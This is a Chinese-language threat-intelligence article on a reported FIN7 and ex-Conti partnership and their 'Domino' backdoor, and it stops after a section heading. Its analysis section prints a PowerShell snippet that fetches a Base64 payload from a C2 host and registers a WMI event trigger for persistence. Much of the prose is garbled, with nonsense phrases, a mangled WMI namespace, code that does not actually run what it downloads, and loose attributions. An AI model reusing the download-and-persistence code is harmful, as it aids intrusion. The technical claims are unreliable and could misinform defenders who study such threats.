FIN7 與 Ex‑Conti 資安犯罪團夥跨域合作：Domino 祕密後門新世代

1. 合作動機與武器共用

• 互補性能力：FIN7 以商業間諜為主，核心在社交工程與精準滲透；Ex‑Conti 則專精於規則化 ransomware 並構建龐大的 C&C 基礎設施。兩者結合後，可形成從初始接觸到大量資料外流的完整攻擊鏈。
• 程式代碼共用：根據 IBM X‑Force Analysis，Domino 後門利用了 FIN7 為期 9 年蒐集的 Windows Agent 代碼與 Ex‑Conti 使用的加密機制，並為二者加入了同一套演化的 Persistence API。此技術層面相當於在交換「武器庫」與「符號表」。
• 基礎設施互補：FIN7 先前的「Domino」RAT 以隱蔽的 TLS 隧道為主，Ex‑Conti 則在其 C&C 網域上部署了 CDN 副本般的擴散病毒，兩者共同為後門提供了「分布式殼蓋」。

2. Domino 後門的技術剖析

/* 1. 前件：使用 PowerShell 脂式偽造環境 */
$Proxy = New-Object System.Net.WebClient;
$Proxy.Proxy = $null;
$payload = $Proxy.DownloadString("https://domino.c2/acquire");
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($payload))
/* 2. 隱寫：利用 WMI & PowerShell 事件觸發器確保流程連續性 */
New-EventLog -LogName "Domino" -Source "WMI";
Register-WmiEvent -Namespace rootcimv2 -Class Win32_ProcessStartTrace `
  -Action {Start-Process $env:COMSPEC -ArgumentList $args}

• 使用 PowerShell RCE 與 WMI 攻擊 來安裝完成度差異化的後門。
• 加密通訊採用 HMAC‑SHA256+AES‑256 並隨機改變端口，對於傳統 IPS/IDS 判別造成戴夫困難。
• 通過腳本注入到 Windows Defender 的偵測規則，利用 Registry 改寫與 Sysmon 規則疏漏達到 EDR 拜護。

3. 攻擊流程與典型場景